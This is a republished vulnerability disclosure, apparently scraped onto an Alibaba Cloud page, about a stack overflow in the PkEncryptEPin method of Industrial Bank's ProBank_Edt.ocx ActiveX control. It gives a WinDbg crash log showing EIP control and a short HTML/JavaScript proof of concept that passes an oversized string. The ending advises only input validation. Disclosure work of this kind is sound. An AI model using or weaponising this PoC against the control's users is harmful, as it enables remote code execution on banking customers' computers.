A software application in Industrial Bank can directly execute code remotely.

Source: Internet
Author: User

A software application in Industrial Bank can directly execute code remotely.

The PkEncryptEPin function of the ProBank_Edt.ocx control of the Industrial Bank has stack overflow.


This will cause stack overflow, and the EIP will be controlled, directly 0x41414141

Password control download link https://personalbank.cib.com.cn/pers/main/resources/js/CIB_Plugin.exe


Crashinfo:


ModLoad: 03750000 03764000 C:\PROGRA~1\PROBAN~1\PROBAN~1.OCXModLoad: 73d30000 73e2e000   C:\WINDOWS\system32\MFC42.DLLModLoad: 61be0000 61bed000   C:\WINDOWS\system32\MFC42LOC.DLL(e10.1ec): Break instruction exception - code 80000003 (first chance)eax=7ffde000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005eip=7c92120e esp=036cffcc ebp=036cfff4 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll - ntdll!DbgBreakPoint:7c92120e cc              int     3Missing image name, possible paged-out or corrupt data.0:016> g(e10.f14): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00004000 ebx=77c0f931 ecx=00000875 edx=020dd8dc esi=03878e40 edi=020e0000eip=03755197 esp=020dd8b8 ebp=0387b030 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\PROBAN~1\PROBAN~1.OCX - PROBAN_1!DllUnregisterServer+0x3127:03755197 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]0:008> g(e10.f14): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=00000000 ecx=41414141 edx=7c9232bc esi=00000000 edi=00000000eip=41414141 esp=020dd4e8 ebp=020dd508 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246<Unloaded_pi.dll>+0x41414140:41414141 ??              ???

 


Vulnerability poc:

<object id='obj' classid='CLSID:{8BE81FD3-B85E-CD48-1179-1B592DDE9815}'></object><script>argv1="A"argv2="A"while(argv2.length<16384)argv2+=argv2ret = obj.PkEncryptEPin(argv1,argv2)</script>



Demo process

Install controls

 




 




Build a Web Service terminal and directly activate poc.html


 




The figure above shows the wingdbg crash information.

 




We can see that the eip is directly controlled 0x41414141, that is, the ascii value of the second parameter "".
 

Solution:

Strictly verify the input parameters

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.